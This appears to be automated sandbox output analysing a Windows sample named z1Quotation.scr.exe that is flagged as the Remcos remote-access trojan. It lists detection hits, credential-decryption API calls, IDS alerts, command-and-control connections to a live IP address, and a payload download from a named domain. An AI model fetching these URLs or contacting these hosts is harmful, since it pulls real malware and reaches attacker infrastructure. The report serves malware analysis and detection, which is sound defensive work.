                Source: z1Quotation.scr.exeVirustotal: Detection: 18%Perma Link
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z1Quotation.scr.exe PID: 1412, type: MEMORYSTR
                Machine Learning detection for sample
                Source: z1Quotation.scr.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,137_2_00404423

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeUnpacked PE file: 140.2.z1Quotation.scr.exe.400000.0.unpack
                Source: z1Quotation.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 102.65.21.26:443 -> 192.168.11.20:49760 version: TLS 1.2
                Source: z1Quotation.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: c:\Projects\VS2005\BrowsingHistoryView\Release\BrowsingHistoryView.pdb source: z1Quotation.scr.exe
                Source: Binary string: D:\qb\workspace\23788\source\audio_codec\HDAudioDrv\x64\DAudRelease\IntcDAud.pdb source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_00405B60 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405B60
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_00406731 FindFirstFileA,FindClose,0_2_00406731
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004027AF FindFirstFileA,0_2_004027AF
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040AE51 FindFirstFileW,FindNextFileW,137_2_0040AE51
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,138_2_00407EF8
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,139_2_00407898
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_004098C4 FindFirstFileW,FindNextFileW,140_2_004098C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,146_2_00407898
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzqJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzvJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Temp\hhsvynxtJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49764 -> 23.106.238.209:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49763 -> 23.106.238.209:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49761 -> 23.106.238.209:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49769 -> 23.106.238.209:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49770 -> 23.106.238.209:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49767 -> 23.106.238.209:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49768 -> 23.106.238.209:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49771 -> 23.106.238.209:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49774 -> 23.106.238.209:2404
                Source: global trafficTCP traffic: 192.168.11.20:49761 -> 23.106.238.209:2404
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49762 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49760 -> 102.65.21.26:443
                Source: global trafficHTTP traffic detected: GET /FrKSUMZ203.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: telesavers.co.zaCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /FrKSUMZ203.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: telesavers.co.zaCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: z1Quotation.scr.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: z1Quotation.scr.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: telesavers.co.za
                Source: global trafficDNS traffic detected: DNS query: subddfg.lol
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://OCSP.intel.com/0
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33996272367.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33995869114.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36286467585.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000002.36290061377.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36215218240.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33996272367.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33995869114.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36286467585.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000002.36290061377.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36215218240.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.quovadisglobal.com/qvicag4.crl0
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.quovadisglobal.com/qvrca.crl0
                Source: z1Quotation.scr.exe, 00000082.00000003.34024760811.0000000007483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35122151040.0000000007489000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34024760811.0000000007483000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35959037232.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34024760811.0000000007487000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121905251.0000000007487000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121957679.00000000073E0000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpB_
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpH_
                Source: z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpM
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpV_0
                Source: z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/json.gp
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpo_
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpsg
                Source: z1Quotation.scr.exe, z1Quotation.scr.exe, 00000000.00000000.32405926725.000000000040A000.00000008.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000082.00000000.32835780083.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: z1Quotation.scr.exe, 00000000.00000000.32405926725.000000000040A000.00000008.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z1Quotation.scr.exe, 00000082.00000000.32835780083.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.quovadisglobal.com05
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.quovadisglobal.com0O
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.intel.com/crl/IntelCA7B.crl0f
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.intel.com/crt/IntelCA7B.crt0
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trust.quovadisglobal.com/qvicag4.crt0
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trust.quovadisglobal.com/qvrca.crt0
                Source: z1Quotation.scr.exeString found in binary or memory: http://www.ebuddy.com
                Source: z1Quotation.scr.exeString found in binary or memory: http://www.imvu.com
                Source: z1Quotation.scr.exeString found in binary or memory: http://www.nirsoft.net/
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33996272367.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33995869114.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36286467585.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000002.36290061377.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36215218240.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/repository0
                Source: z1Quotation.scr.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33996272367.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33995869114.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36286467585.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000002.36290061377.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36215218240.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968794940.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35959037232.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35979025881.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35989039555.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121957679.00000000073E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/(
                Source: z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/)
                Source: z1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/-4062-986e-6b0fce555694
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/-4062-986e-6b0fce555694s
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/-4062-986e-6b0fce555694sDN
                Source: z1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/Bo
